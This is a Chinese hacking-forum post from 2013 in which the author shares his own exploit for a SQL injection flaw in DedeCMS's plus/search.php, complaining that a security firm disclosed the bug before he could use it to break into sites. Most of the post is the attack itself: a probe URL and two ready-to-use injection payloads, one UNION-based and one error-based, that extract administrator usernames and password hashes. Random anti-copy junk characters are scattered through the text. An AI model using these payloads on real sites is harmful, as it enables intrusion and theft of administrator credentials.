找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ( y# W( a, ]# i  ]

2 P! b  h5 R% I( D0 H8 j* X哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
9 s) \" C. z9 k7 N
# t' }( [1 n% X既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
, J) |7 e2 d. C0 V) z# P  f# M4 @4 J; d
我一般是这样测试的:
5 V! k9 B% t" x
5 k$ `( |- R* e提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
/ y  q( ^$ i- p0 g- X# L
2 n! @5 K$ P, a. }. Q转载不加作者名的没JJ
: J* B" i( O# I0 r4 J; a: {+ t, }" s( e% B6 ]
作者:鬼哥
$ z2 F( w. [7 Z( a& Y% M
/ f% t5 h% b- y$ Y+ u
, x" Q- E4 g% a3 j1 V! G0 m6 b+ {+ b8 _2 l$ }
看结果如果提示  @, K- U- f/ y% i: }( ]
7 m5 B, n! A% J5 v( W
Safe Alert: Request Error step 2 !
3 _, E7 u& [2 x3 i: B* C
% M4 ?$ R8 ?$ `* l2 T! ^那么直接用下面的exp
8 `; d( p( g  t: ~; r
9 s" K+ i1 @* {0 [+ k: B% [2 A8 Mxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a, O; {8 @. z$ u5 T

; f9 d- |- F! b9 ~, l+ r! }5 y6 e: P% R5 q
看结果如果提示
, [& U) A- f1 a) h% y- j! i! n% i9 P7 i
Safe Alert: Request Error step 1 !
" P, v7 L' g" f, b5 I2 ?; i! d4 f* _5 m$ V0 g2 d' [
那么直接用下面的exp6 B. ~, V2 c( B. @& T0 t

+ J5 K$ @9 v: N+ J+ Z8 L$ ~  L5 J5 V! ?xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a7 ^  j7 i/ M% |3 }8 h( }

3 I8 W5 [' h+ [. w9 d0 I: @) I2 P- W% Y- x; P+ m
如果正常显示证明漏洞不存在了。
9 y& e" }! ?' T0 r
8 I' C+ O# u0 m! X! T5 q; J& u转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表